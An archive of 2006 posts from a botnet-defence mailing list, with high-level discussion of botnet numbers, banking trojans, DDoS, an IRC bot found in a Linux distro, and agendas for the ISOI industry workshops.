Microsoft ( http://isotf.org/isoi2.html ) and see what bright ideas we come up with. Gadi. ___ phishing mailing list phishing@whitestar.linuxbox.org http://www.whitestar.linuxbox.org/mailman/listinfo/phishing ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] [funsec] Botnet Infected User's PC Results In Armed Police Raid (fwd)
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Either they have a very interesting case, or they are newbies investigating these frauds for the first time, turning up with warrants at infected people's houses. -- Forwarded message -- Date: Fri, 8 Dec 2006 05:11:15 GMT From: Fergie [EMAIL PROTECTED] To: funsec@linuxbox.org Subject: [funsec] Botnet Infected User's PC Results In Armed Police Raid -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Via ABC 7 News (Denver). [snip] A Denver woman who didn't have adequate security on her home computer paid the price. Serry Winkler was visited by several officers with a search warrant who demanded that she turn over her computer. They were investigating a case of computer fraud. The woman's computer was apparently infected by a bot or robot. Investigators said someone hacked into Winkler's computer, stole her IP address and used it with a stolen credit card to make fraudulent purchases online. Police said they were trying to get to the bottom of it. [snip] More: http://www.thedenverchannel.com/news/10486347/detail.html - - ferg -BEGIN PGP SIGNATURE- Version: PGP Desktop 9.5.1 (Build 1557) wj8DBQFFePPuq1pz9mNUZTMRAowDAKCa2Kp+Ks4wX4ARGwWJD7aJtFGYUACaAxJP 9DbjdTaeOc0J3cWgplNtSik= =huOw -END PGP SIGNATURE- -- Fergie, a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawg(at)netzero.net ferg's tech blog: http://fergdawg.blogspot.com/ ___ Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Note: funsec is a public and open mailing list. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] Agenda and Schedule for January Workshop
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- The agenda and schedule for the workshop can be found here: http://isotf.org/isoi2.html Only 9 seats left. Gadi. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] Possible DNS DDOS attack
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Thu, 7 Dec 2006, Pagnozzi Sergio wrote: Help me understand: This is an attack on your network, coming from many IPs in the world to a single IP address in your network? This is an attack coming from your network, going from many machines to a signle IP address in someone else's network? Well... I don't know exactly what's up on my network... I can see massive dns A/ query to my DNS server both from ITZ and my internal host... This happen in determinated period... From 9 to 12 AM and from 2 to 20 PM i'ts 2 day long that we can see that.. Can you upload a packet capture somewhere? -- No virus found in this outgoing message. Checked by AVG Free Edition. Version: 7.0.409 / Virus Database: 268.15.14/578 - Release Date: 07/12/2006 CONFIDENTIALITY NOTICE This message and its attachments are addressed solely to the persons above and may contain confidential information. If you have received the message in error, be informed that any use of the content hereof is prohibited. Please return it immediately to the sender and delete the message. Should you have any questions, please contact us by replying to [EMAIL PROTECTED] Thank you www.telecomitalia.it ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] 2 Days of Photo Cart Vulnerability Attack
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Thu, 7 Dec 2006, William Atchison wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Perhaps this might be of interest to a few of you as some of the locations where this attack originates from are definitely compromised servers. http://incredibill.blogspot.com/2006/12/botnet-attempts-photo-cart.html http://incredibill.blogspot.com/2006/12/day-two-of-photo-cart-attack.html These are remote file inclusion attacks. You have seen some which happen quite a lot, yet get very little attention. -- Bill Atchison http://www.crawlwall.com (650) 358-9649 ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] perliminary agenda for ISOI 2 (DA Workshop, January at Microsoft)
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Sun, 3 Dec 2006, virendra rode // wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Gadi, Will minutes and /or presentation made available for folks who won't be attending this workshop? In my case, I will be out of the country. I hope to be able to do so, it is not clear at this point. Gadi. regards, /virendra Gadi Evron wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- -- Forwarded message -- Date: Sat, 2 Dec 2006 10:27:55 -0600 (CST) From: Gadi Evron [EMAIL PROTECTED] Subject: perliminary agenda for ISOI 2 (DA Workshop, January at Microsoft) Hi again guys. The following is a perliminary and incomplete list of speakers for the DA workshop (ISOI 2). I hope to have something more complete, with schedule, soon. Jauary 25-26, Redmond (Hosted by Microsoft with after-party dinner by Trend Micro). Please remember to RSVP! Speakers Righard Zwienenberg (Norman) - SandBox solutions are NOT the ultimate solutions and can be beaten... (sandboxes countermeasures, case study from Norman) - Panel: From Botnet to Shutdown and Prosecution: What to do? Hubbard, Dan (Websense) - Web War Games (what we don't know *will* hurt us/malware profiteering/automated tools - webattacker) Alex Shipp (Message Labs) - Intelligence update: targeted trojan attacks Andrew Fried (IRS) - Problems and solutions when investigating phishing cases Greg Galford (Microsoft MSRC) - MSRC handling of 0day attacks Paul Fergie Ferguson (Trend Micro) - Innovations in using DNS as an early warning system for attacks/botnets - Discussion: Creating an updated BCP 38 at the IETF Ziv Mador (Microsoft antimalware) - Zero-day exploits in 2006 - the Microsoft antimalware team's perspective Gadi Evron (Beyond Security, ISOTF) - Planning an intelligence war - Web servers as botnets and hosting farms as attack platforms Barry Greene (Cisco) - Netflow revisited - Discussion: TBA Randy Vaughn - Contacting the world: building and perfecting an AS-based reporting system Chris Wee (+ Oliver Friedrichs, Symantec) - Trolling the BotNet Economy Jose Nazario (Arbor) - DDoS and Botnets: Same as it ever was (statistics and trends) Douglas Otis - Abusing SPF for a DDoS amplification attack DDoS on DNS Christoph Fischer - TBD: Intelligence update: MiTM and banking trojan horses Joe Hartmann (Trend Micro) - TBD Tom Grasso (FBI) - TBD Danny McPherson - TBA Mike Reavey (Microsoft MSRC) - Discussion: TBA Rob Slade - TBA Jim Deleskie (VSNL) - TBA More speakers TBA. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFFcwvFpbZvCIJx1bcRAo52AKDUc+DMMRbIf1ZDEZB1ioEIuix6QACeI/rn vqBvBvBqOzpnFILTzsnDcKA= =1X6i -END PGP SIGNATURE- ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] Re-branding IPS as an anti botnet tool
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- I have seen a PR last month from Mcafee on this issue, and now they issued another one. For most cases, I don't believe in IDS products. I think that trying to pitch I[DP]S as a solution for botnets is technologically silly, but marketing-wise right on the spot. As THE solution it is plain and simple silly. A lot of security vendors will now start taking that approach, dealing with the buzzword. An IPS will not cure your botnet problems. It may help pinpoint some bots (or similar) on your network, which is important, but that's about it. I wish Mcafee all the luck in the world, but this is, in my opinion, way way way over-hyped: http://www.mcafee.com/us/local_content/white_papers/wp_botnet.pdf In another PR they present a case study on how they saved a south American country from a botnet attack using their IPS. I would like to see more.. or something, to back it up as to how, before I state my opinion. What do you think? Gadi. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] [funsec] Haxdoor: UK Police Count 8, 500 Victims in Data Theft (So Far) (fwd)
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- So, here we go. Real-life uses for vulnerabilities. Below is an example of just ONE drop-zone server in the United States, which has 600 financial companies and banks. Several gigs of data. How do these things work? They get installed by the use of a web vulnerability, an email attachment of network scanning, utilizing several vulnerabilitie. One drop zone, and all this noise gets made. I am very happy to hear that the UK police (which are good people) are doing something about this, however, banks, eCommerce sites, dating sites, etc. all get attacked by these things, by the users being infected. These trojan horses use rootkit technology, with a hook, using man in the middle attacks to bypass the SSL encryption, and steal any HTTPS credentials they come across. These things are so wide-spread, this news item made me raise my eye-brow, at first. So, knowing full-well security is out of our hands, and relies on the security of our users. Knowing full-well that the same technology can be used to bypass 2-factor authentication, how do organizations handle their own security, if they are to have clients? The point is, though, that this is a well planned operation, with new samples being released with new vulnerabilities to exploit, constantly. This should not be considered a one time cease or a lost laptop containing private data. This is what vulnerabilities are about - the damage and operations they are used for. Gadi. -- Forwarded message -- Date: Tue, 24 Oct 2006 21:24:20 GMT From: Fergie [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: [funsec] Haxdoor: UK Police Count 8, 500 Victims in Data Theft (So Far) Via InfoWorld. [snip] British electronic-crime detectives are investigating a massive data theft operation that stole sensitive information from 8,500 people in the U.K. and others in some 60 countries, officials said Tuesday. In total, cybercriminals targeted 600 financial companies and banks, according to U.K. authorities, who have worked over the past week to identify and notify victims. Through intelligence sources, U.K. police were given several gigabytes of data -- around 130,00 files -- that came from a server in the U.S., said Charlie McMurdie, detective chief inspector for the Specialist Crime Directorate e-Crime Unit of the London Metropolitan Police. Most of the data related to financial information, she said. The data was collected by a malicious software program nicknamed Haxdoor that infected victims' computers. Some 2,300 machines were located in the U.K. McMurdie said. [snip] More: http://www.infoworld.com/article/06/10/24/HNukdatatheft_1.html - ferg -- Fergie, a.k.a. Paul Ferguson Engineering Architecture for the Internet fergdawg(at)netzero.net ferg's tech blog: http://fergdawg.blogspot.com/ ___ Fun and Misc security discussion for OT posts. https://linuxbox.org/cgi-bin/mailman/listinfo/funsec Note: funsec is a public and open mailing list. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] [Full-disclosure] Devil Linux 1.2.10 has an IRC bot onboard (fwd)
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- -- Forwarded Message -- Subject: [Full-disclosure] Devil Linux 1.2.10 has an IRC bot onboard Date: Thursday 19 October 2006 11:13 From: Victor Grishchenko [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk Hi! While building and testing a customized version of DevilLinux router distro I found an IRC bot onboard. As far as I understood, it was EnergyMech compiled from source right there plus some executable named TODO (for camouflage purposes). The stuff unfolds at /shm/sshd/ and runs somehow. Sadly, I had no time for detailed investigation. It leaves an overall impression of script kiddie's work. Last days DevilLinux website seems to be dead. Victor Grishchenko Digital Channels Network Yekaterinburg, Russia ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ --- ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] Spammed - sorry
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Fri, 22 Sep 2006 [EMAIL PROTECTED] wrote: In light of recent litigation, I might be inclined to recommend that folks ban all emails from spamhaus.org or from anybody that appears to be sending from spamhaus.org. From the mail headers: mail.amigostecnicos.net (amigostecnicos.net [209.151.108.130]) I almost didn't approve your email message. Then decided I hate censorship. Now, I allowed it through, but that does not mean I will let your lack of understanding and complete spread of libel spoo and spew against spamhaud stand Don't spread lies and don't attack people liek spamhaus before you go and do on your own. And you dare attack Richard of all people? For those interested in what really happened, check spamhaus's site for news on the spammer suing them with, in my opinion, no shame. Keith, if that is your real name, you may be an inncoent bystander who fell for spammer lies, but you spread them further attacking others which has no real excuse. Gadi. -Original Message- From: Richard Cox [mailto:[EMAIL PROTECTED] Sent: Friday, September 22, 2006 6:39 PM To: botnets@whitestar.linuxbox.org Subject: Re: [botnets] Spammed - sorry To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Fri, 22 Sep 2006 09:07:05 -0500 RL Vaughn [EMAIL PROTECTED] wrote: Looks like some filter slipped. I will see if we can tighten up the filters. Like ... reject all mail sent in the future ? -- Richard Cox [EMAIL PROTECTED] ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] AIM botnet in the news
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Wed, 20 Sep 2006, Black Ratchet wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Tue, 19 Sep 2006 5:27am, Gadi Evron wrote: The good thing about IM botnets is that they run on controlled services, and that the people running them can stop them, if they so choose. The impression I got was while the point of attack was over AIM, the botnet itself was IRC based. Yes, the infected systems are likely still there but the infection/propagation is stopped. While AIM runs on a controlled system. I doubt AOL has the time, money, or inclination to deal with it. Else they would have likely stopped a lot of the other AIM worms that have been floating around for a year(?) or so. Who said they don't? Plus, it's not like it's difficult to make gobs of new AIM accounts. (Do they use some kind of CAPTCHA system? It's been ages since I signed up for one.) Setting up new accounts to atttack others is non-trivial. I don't know.. you are right. ~BR ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] [phishing] identities lost in phishing (fwd)
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Hi guys. I would like to invite you to come to the phishing list and participate in this discussion. To subscribe: http://www.whitestar.linuxbox.org/mailman/listinfo/phishing Gadi. -- Forwarded message -- Date: Mon, 18 Sep 2006 06:37:39 -0500 (CDT) From: Gadi Evron [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: [phishing] identities lost in phishing As I often comment, it is funny to me (not really but hold on) when people scraem about this or that organization losing a laptop with 20K identities. What's 20K? Obviously that is important, and speaks volumes of corporate security and of privacy issues. Still, it is insignificant in a laughable fashion when compared to what's being stolen daily online. Every day, millions of online identities and website credentials are lost. Millions. Every day. This is done through trojan horses which are spread (bots, worm fashion) among an immense online population. There are thousands of new variants to these bots coming out every month dedicated specifically as a targeted attack on online financial institutions. These attacks target the financial online sites (banking, eCommerce, etc.) not by attacking them directly on the macro level, but rather by multiple micro-level attacks against their users, en-masse. These trojan horses (bots) are so advanced, the utilize rootkit technology, and when the user surfs to an HTTPS site, use man-in-the-middle attacks on the machine itself to steal his or her credentials. These credentials in turn are sent to the remote attackers for further processing. A lot of money is lost this way. This is a world-wide problem, but it is especially apparent (as the bad guys utilize the data more and more) in, but not limited to, the UK and Europe. In the US this is a growing trend, but it is mostly ignored by the defenders (most are not aware of it) as regular primitive email phishing is still the most apparent threat there. This is largely due to US banks still mostly using username and password authentication. Email phishing is important and a large threat, but it is doomed to death (it will still be here 10 years from now, like Nigerian scams are here today, but as a specific threat it will diminish into obscurity. Phishing today should become the root in a tree called Online Financial Fraud or eFraud. That, friends, is not going away whether in blogs, trojan horses, email or your cell phone. These trojan horse attacks, as they are located on the user's machine itself, are not stopped by 2-factor authentication, etc. There are things that can be done, but when the security problem is on a remote machine not under the, say, bank's control, there is not much they can do with their current confidence risk assesment systems. There are solutions, but these are to be discussed another time. It is obvious that one of the biggest problems facing banks, and ESPECIALLY eCommerce sites (without the physical-space presence) is how to establish reputation systems that will provide with a technological risk assesment confidence decision as to how safe it is to work with a remote user. The web channel is the cheapest and most effective in banking today, and banks will not want to lose it. We (Alan Solomon and myself) cover some of the market involving this technology and how it works in a recent paper we published in the Virus Bulletin September edition: http://www.beyondsecurity.com/whitepapers/SolomonEvronSept06.pdf Others here with experience on this, who are willing to talk, please share your experience with us. Gadi. ___ phishing mailing list [EMAIL PROTECTED] http://www.whitestar.linuxbox.org/mailman/listinfo/phishing ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] go FTC
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- http://news.zdnet.com/2100-1009_22-6115948.html Gadi. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] Paper: Analyzing Large DDoS Attacks Using Multiple Data Sources
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- This paper was brought to my attention now three times, so I figured I might as well email it here. An interesting read: http://www.research.att.com/~kobus/docs/ddos.lsad.pdf Gadi. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] phishing mailing list
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- The [EMAIL PROTECTED] mailing list is now going live, months too late, but hey, let's get started on phishing issues over there. Gadi. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] [Full-disclosure] the world of botnets article and wrong numbers
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Thu, 14 Sep 2006, Botnet Hunter wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On 9/14/06, Gadi Evron [EMAIL PROTECTED] wrote: AVG is 15K, I can prove *on my own* 12K... counting banking/phishing trojan horses, general purpose trojans, dialers, etc (from the large bot families). So... by both your and Jose's definitions Banker.Delf is a bot? A dialer is a bot? A downloader is a bot? An Explorer Hijack is a bot? I treat the banker family (and similar) as bots. Absolutely. A phishing email is a bot? If the email has a certain attachment with it, that I will call a banker trojan, than yes. If it spreads as such (or more importantly, through such) and reports to a centralized location, than yes, it is a bot. A bot is a trojan horse, often with spreading capabilities and a centralized reporting/control mechanism. I'm sorry, but while I believe botnets (particularly those controlled via HTTP(S) which follow protocol standards) are a serious problem - your numbers don't ring true to the fairly large set of samples I see under my definition of a bot. They don't seem to be ringing true with What is your definition of a bot? some of other people either. In fact, to me, they sound a lot like hype. The numbers I mentioned are about the known bot familities, such as agobot, rbot, etc. The fact I call a banker a bot is unrelated to these numbers but should add about a thousand. Not much more. If you include other phishing trojans with central control/reporting mechanisms that I do count, quite a bit more. What do you think bots are used for? Multi-purpose bots are not the only trojan horse I will refer to as a bot. That said, I will not treat a self-replicating virus as a bot. :) I understand the confusion, but there is nothing to be confused about. These numbers are accepted and known. Your disbelief is out of your lack of willingness to accept such numbers, as you stated. 2,000-3,000 a month of true connection oriented and non-connection oriented bots (IRC vs. HTTP custom protocol) which are capable of Connection oriented? receiving and acting on multiple commands are what I'm seeing. This Ahh, multi-purpose bots. would include the classic bot/zombie, the http and custom protocol bot/zombie and some RATs. Hmm, p2p? Gossip-algorithms based? WEB services based? No connection at all but rather act as a dropper? The dropped result? Specific-purpose trojans? Phishing trojans? (bots) So saying you have a 12 penis may in fact be true and yes... it might even make me feel a little insecure about my smaller manhood. But not if your talking about a piece of plastic. I suggest you see a doctor about that, they have operations to help with insecurity these days. But seriously, these numbers are what they are, I wish they were invented, but they are not. Please, let me elaborate further on whatever you like. Please grill me here and now about them. Ask me the questions you want to ask. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] [Full-disclosure] the world of botnets article and wrong numbers
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Fri, 15 Sep 2006, Jörg Weber wrote: I can second that, from a not-associated-with-anyone-POV. I get many, many slightly mutated versions of the same bot every day, on average one new version a day, on a very small honeynet. More often than not, AV fails to detect these mods. I obviously don't reach 15k/month, but in this case size does matter. Seen that these mutations could be simply mailed around, too, and AV wouldn't detect them either, makes counting them as unique, new, bots a valid POV, methinks. Indeed. You should note though that the bad guys have the advantage of being able to test their creations against the anti viruses before release.. which is kind of an issue. The AV is not any type of perfect solution for a long time now. It plays a critical part in the fight, but it is far behind being just reactive. Indeed. Cheers, Joerg -- Joerg Weber M. A. Teamleiter Netzwerk-Sicherheit/Netzwerk-Applikationen infoServe GmbH Nell-Breuning-Allee 6 D-66115 Saarbruecken T: (0681) 8 80 08 - 59 F: (0681) 8 80 08 - 33 www.infos.de mailto: [EMAIL PROTECTED] it sounds like we're on the same page, but you may feel it's hyping the problem to talk about new bots based on unique MD5 values. it's not my favorite way of thinking about it, but it is easily underscored by a real-world fact: many AV vendors fail to detect the same bot source simply repackaged or re-configured (ie a new IRC server, everything else the same). hence, each new MD5 means a new detection hit for them. so, hype has a real-world backing, namely AV detection issues. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] [Full-disclosure] the world of botnets article and wrong numbers
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Thu, 14 Sep 2006, Dude VanWinkle wrote: On 9/14/06, Gadi Evron [EMAIL PROTECTED] wrote: This counts bot samples. Whether they are variants (changed) or insignificant changes such as only the IP address to the CC, they are counted as unique. So if you have multiple machines NAT'ed under one IP, that is one pot. err bot eh? OK. And if I see 10 bots usingthe same address on a dynamic range.. ever heard of DHCP? The number crunching schemes arenever perfect but they are pretty good. I count, much like many others, unique IPs. A bot is defined as an instance of an installed Trojan horse. One machine mayhave (and probably does have) several. We can count IPs and we do. 3.5 Million hosts, note, for spam alone. The total population count is mind-boggling. I believe spamhaus has it pinned at 3.2 millions, other have higher numbers. That's about where it is for EMAIL based spam, per day. This is why we now run different sharing projects between established honey nets. So you dont count botnets that detect honeynets eh? Honey pot detection is an interesting field, I am familiar with it and even consider myself somewhat of a knowledgable person on it, but there are those who research it actively. As interesting as it may be, it's not much of a field yet, sorry to say. Honey pots of different kinds work marvelously. Not all our sources for samples are the same. It would be silly of me to divulge them all (especially as personally I have no use for samples these days and others do). Still, we can only report what we see, what do you see? or other trivial changes? Do you attempt to correct for complex polymorphic variants? Nah, just contributors who dont all have publicly routable IP's and this herders that know about VMware/Honeywall There aren't many of those.. really. :) Really? Ok. Further, the anti virus world sees about the same numbers. Using the same methods? And their reporting user-base, alliances and sharing artners, and what not. Yes. D o you think all bots are extremely smart rootkits? I am quite happy to say most botnets are nothing if not the re-use of old code, which is freely available, using the same old methods. There are other types of malware out there. The Microsoft anti malware team (and Ziv Mador specifically) spoke of 15K avg bot samples a month, as well. Gotcha, you MS and Symantec share numbers based of who doesnt know how to disable your detection methods You assume too much Dude. Still, you are right, 100%. I can only detect what I know how to detect. But samples are not the only way to follow botnets, and there are many ends on how to approach one problems. Cryptic? I suppose, but hey, Google for methods, see what you find, and tell me what you think. I believe we have pretty good coverage, but I also need to admit most anti viruses do not cover bot detection very well. I am just saying, the larger the organization, the sharper the focus from the other side. Maybe a loose coalition of known non-bullshitters would have a more accurate picture. The picture you got is pretty accurate. Don't take my word for it though. I am happy to examine and share (as much as I can, which is more than enough to show the numbers (lower numbers) we chose to show in the article. What numbers do you need? What makes you doubt what we have given? I'd be more than happy to answer any question you have or counter-numbers you have, but your love for me is as irrelevant as you calling me a *** when you don't show your own data or challange mine with actual questions like Dave (the other dave) did. Thanks, Gadi. still love ja tho Gadi, -JPthe douchebg Got a link/quote/reference to that? Does Ziv explain the methodology that they are using? Nope, but I will ask. Most of the numbers I get are at 15K. I can only prove *on my own* without relying on other sources, as reliable as they may be, 12K, which is the number we mentioned in the article. We were being conservative due to that reason, but the number is higher. I don't know what others may be seeing, but this is our best estimate as to what's going on with the number of unique samples released every month. Jose Nazarijo from Arbor replied on the botnets list that he sees similar numbers. I hope this helps... what are you looking to hear? Some kind of explanation for the huge disjunction between these numbers and our instinctive ideas about what's possible. Of course, being I followed you this far, but to be honest, your ideas (what are they?) are indeed very far from reality... :) un-worked-out intuitive estimates, such ideas are of course entirely likely to be off the mark, but off the mark by two orders of magnitude? Hence the request for more methodological details
Re: [botnets] the world of botnets article number?
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Tue, 12 Sep 2006, Toby McKay wrote: hello gadi. in your recent the world of botnets article that you mentioned, you wrote that there are an average of 12K bots a month in-the-wild. Where do you get this number? ./mcktoby I've been getting private queries on what article this is. You can find it here: http://blogs.securiteam.com/index.php/archives/593 http://www.beyondsecurity.com/whitepapers/SolomonEvronSept06.pdf Any input appreciated. Thanks, Gadi. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] mitigate botnets in 5 steps!
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Okay, who picks up the glove? I wanna see: Botnets for dummies by next year. Gadi. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] uh huh
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Bauer cites Maxwell's lack of a criminal record and maintains that he did not intend such an extensive spread of his robot virus program, or botnet software http://seattlepi.nwsource.com/local/282561_botnet25.html ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] final agenda for August 10th DA Workshop
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Probably will have final tweaks. Web site: http://isotf.org/isoi.html Please note, aside to bringing us all together, one of the main goals is seeing the different perspectives and current operations of the different sides of the fight. Namely: Law enforcement, Anti Viruses, Anti Spam, Dynamic DNS Porviders and ISP's. So far, 67 spots out of 75 available at the Cisco facility in San Jose are taken. The agenda is quite tight. Thank you all for your support in setting this up at such short notice, and for the community for getting involved beyond the closed circle groups. Agenda -- 09:00 - 09:05 - Preview of the day - Gadi Evron (Beyond Security) 09:05 - 09:30 - Early sessions - botnets from different perspectives, hosted by Paul Vixie (ISC): ISP's Barry Greene (Cisco) Anti Virus industry Joe Hartmann (Trend Micro) DynDNS providersJoshua Anderson (Afraid) Anti spam and reputation services Dave Crocker (Brandenburg InternetWorking) Main Lectures: 09:30 - 10:10 Key-note: Bot, Botnets, Sandbox, Impact Righard J. Zwienenberg (Norman) 10:10 - 10:45 MSRC Malware/Exploit Zero Day Response - Case StudiesGreg Galford (Microsoft) 10:45 - 11:20 The Rough Road Around Us in Botnet Tracking Jose Nazarijo (Arbor) 11:20 - 11:55 Malcode Toolkit Profiteering: Feeding the Trend in M.O. from Fame to Fortune Hubbard Dan (Websense) 11:55 - 12:30 Lunch break Got chow? 12:30 - 13:05 Case Study: *** Levi Gundert (US Secret Service) 13:05 - 13:40 Recent Bots Detection Information from Microsoft Security Products Ziv Mador (Microsoft) 13:40 - 14:25 Router Stress: An Under the Hood Look at How a Router is Really Attacked and DOSed Barry Raveendran Greene (Cisco) 14:25 - 15:00 What Keeps Us Up at Night: New Advanced Difficult to Mitigate DDoS Attacks Darrel Lewis (Cisco) 15:00 - 15:35 Phishing and Botnets Organized Crime: Globalization and Tehnology Intelligence UpdateGadi Evron (Beyond Security) 15:35 - 16:10 TBA Jerry Dixon (US-CERT, DHS) Turbo talks: 16:20 - 16:35 The Global Infection Rate Rick Wesson (Alice's Registry) 16:35 - 16:50 Fast-flux Botnet CC Servers - Detection Mitigation Randy Vaughn (Baylor) 16:50 - 17:10 TBA David Ulevitch (EveryDNS / OpenDNS) 17:10 - 18:30 - Community discussion subjects: The Past Year in Activity Gadi Evron Law Enforcement Cooperation Operations TBA Creating More Actionable Intelligence TBA The Ratout AS-based Reporting System, Overview and Future DevelopmentRandy Vaughn Activity for the Coming Year Gadi Evron After-party: Dinner, hosted by the ISC. Gadi. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
[botnets] ISOI - DA Workshop agenda and web page
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Hi. You can find the information and latest agenda on the DA workshop on this URL: http://isotf.org/isoi.html It will be updated in the next few days to include a suggested hotel and the rest of the names missing for the listed lectures. Quick reminders: 10th of August, hosted by Cisco in San Jose. Please confirm your arrival. Also, please confirm if you will stay for the dinner hosted by the ISC. Thanks, Gadi. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
